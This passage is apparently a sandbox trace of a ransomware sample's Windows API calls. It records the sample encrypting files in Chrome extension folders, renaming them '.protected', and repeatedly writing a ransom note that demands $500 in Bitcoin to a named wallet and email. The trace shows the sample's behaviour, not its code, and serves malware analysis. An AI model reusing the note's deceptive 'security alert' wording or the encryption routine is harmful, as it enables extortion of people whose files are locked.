SERVER-ID:\r\n") returned 1341 [0079.135] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.136] lstrlenA (lpString="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") returned 684 [0079.136] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 
[0079.136] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.136] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.136] CloseHandle (hObject=0x160) returned 1 [0079.136] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0079.136] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0079.136] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata") returned 139 [0079.136] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0079.136] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0079.136] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*") returned 141 [0079.136] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 
0x47bbd0 [0079.137] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.137] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.137] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.137] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.137] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.137] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\.") returned 141 [0079.137] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.137] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.137] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.137] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.137] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.137] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.137] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.137] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\..") returned 142 [0079.137] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.137] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.137] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", 
lpString2="Program Files (x86)") returned -1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0079.137] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0079.137] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.137] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0079.137] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.137] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.137] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.138] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0079.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.139] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0079.139] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0079.139] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0079.139] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0079.140] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.140] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x160, lpOverlapped=0x0) returned 1 [0079.140] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.140] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.140] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.140] CloseHandle (hObject=0x164) returned 1 [0079.140] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.protected") returned 170 [0079.140] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0079.141] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0079.141] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0079.141] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.141] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0079.141] lstrcmpW 
(lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0079.141] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.141] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.141] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0079.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.142] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0079.142] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json") returned 162 [0079.142] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0079.142] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, 
lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.143] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.143] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.144] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.144] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.144] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0079.144] CloseHandle (hObject=0x164) returned 1 [0079.144] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.protected") returned 172 [0079.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.protected")) returned 1 [0079.145] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.145] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.145] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0079.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.155] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.155] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.156] lstrlenA (lpString="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") returned 684 [0079.156] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.156] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.156] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.156] CloseHandle (hObject=0x160) returned 1 [0079.156] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0079.156] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0079.156] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\RESTORE_FILES.txt") returned 147 [0079.156] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0079.157] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.157] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0079.157] lstrlenA (lpString="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") returned 684 [0079.157] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0079.157] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.157] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.158] CloseHandle (hObject=0x15c) returned 1 [0079.159] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0079.159] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0079.159] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt") returned 141 [0079.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0079.159] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.159] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0079.160] lstrlenA (lpString="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") returned 684 [0079.160] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0079.160] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.160] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, 
lpOverlapped=0x0) returned 1 [0079.160] CloseHandle (hObject=0x158) returned 1 [0079.160] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="Windows") returned -1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="Program Files") returned -1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="Program Files (x86)") returned -1 [0079.160] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="$Recycle.bin") returned 1 [0079.161] lstrcmpiW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="System Volume Information") returned -1 [0079.161] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf") returned 123 [0079.161] lstrcmpW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2=".") returned 1 [0079.161] lstrcmpW (lpString1="apdfllckaahabafndbhieahigkjlhalf", lpString2="..") returned 1 [0079.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*") returned 125 [0079.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0079.161] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.161] lstrcmpiW 